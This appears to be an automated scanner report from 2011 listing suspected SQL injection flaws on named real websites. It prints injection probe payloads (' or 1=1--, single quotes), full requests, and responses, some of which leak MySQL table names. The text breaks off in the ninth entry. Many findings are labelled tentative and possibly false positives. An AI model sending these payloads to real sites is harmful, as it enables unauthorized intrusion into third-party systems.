SQL Injection, CWE-89, CAPEC-66, Single Quote, Database Error, DORK Report

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Apr 02 06:09:43 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. SQL injection

1.1. http://www.almanac.com/server-status [REST URL parameter 1]

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1]

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]

1.5. http://www.comannet.com/server-status [REST URL parameter 1]

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]

1.7. http://www.essortment.com/server-status [REST URL parameter 1]

1.8. http://www.excite.com/server-status [REST URL parameter 1]

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]

1.16. http://www.travelscream.com/server-status [REST URL parameter 1]

1.17. http://www.usf.edu/server-info [REST URL parameter 1]

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]

1.19. http://www.usf.edu/server-status [REST URL parameter 1]

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]

1.21. http://www.x17online.com/server-status [REST URL parameter 1]


1. SQL injection
There are 21 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://www.almanac.com/server-status [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.almanac.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15683602'%20or%201%3d1--%20 and 15683602'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status15683602'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:04 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=aqdrue1g1femjn1184avvm59u0; expires=Mon, 25 Apr 2011 05:35:24 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-9c5995c6232e15094ed8efbadb093bcd" value="form-9c5995c6232e15094ed8efbadb093bcd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D1--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D1--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

Request 2

GET /server-status15683602'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:05 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=thrjklvktfllcbbrnrtksti2o0; expires=Mon, 25 Apr 2011 05:35:25 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c33428d33a05097a7fac9f7ca4d293bd" value="form-c33428d33a05097a7fac9f7ca4d293bd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D2--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D2--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...
1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beeg.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.beeg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:13:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 303

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'favicon.ico'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'' AND `Name` = ''' at line 1]
1.3. http://www.beeg.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 307

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''server-status'' AND `Name` = ''' at line 1]

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 296

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status?1'=1' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND `Name` = ''' at line 1]

Request 2

GET /server-status?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
1.5. http://www.comannet.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21186257'%20or%201%3d1--%20 and 21186257'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status21186257'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 353
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status21186257' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status21186257'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status21186257' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>
1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 93324201%20or%201%3d1--%20 and 93324201%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?193324201%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status?193324201%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 330
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>
1.7. http://www.essortment.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 03:00:05 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 03:00:05 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
1.8. http://www.excite.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.excite.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 86407274'%20or%201%3d1--%20 and 86407274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status86407274'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:30 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 89486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonville|20090913011|Ind|Jac|Pre-game|13|0||||||||20090913|15";
nfl_scores[8] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New Orleans|Detroit|20090913018|NO|Det|Pre-game|13|0||||||||20090913|15";
nfl_scores[9] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Tampa Bay|Dallas|20090913027|TB|Dal|Pre-game|13|0||||||||20090913|15";
nfl_scores[10] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Arizona|San Francisco|20090913022|Ari|SF|Pre-game|16|15||||||||20090913|15";
nfl_scores[11] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New York|Washington|20090913019|NYG|Was|Pre-game|16|15||||||||20090913|15";
nfl_scores[12] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Seattle|St. Louis|20090913026|Sea|
...[SNIP]...

Request 2

GET /server-status86407274'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:31 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 90131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var DOW_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INDU&alias=/alias/money/cm/qt"><font color=#0033cc>DOW</font></a>';
var DOW_LAST = '11,231.96';
var DOW_NET_CHANGE = '<font color=black>0.00</font>';
var NASDAQ_SYMBOL ='<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^COMPX&alias=/alias/money/cm/qt"><font color=#0033cc>NASDAQ</font></a>';
var NASDAQ_LAST = '2,243.32';
var NASDAQ_NET_CHANGE = '<font color=black>0.00</font>';
var SP500_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INX&alias=/alias/money/cm/qt"><font color=#0033cc>S&P 500</font></a>';
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonvi
...[SNIP]...
1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.helium.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19769932'%20or%201%3d1--%20 and 19769932'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?119769932'%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14619
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions415 = new Object();
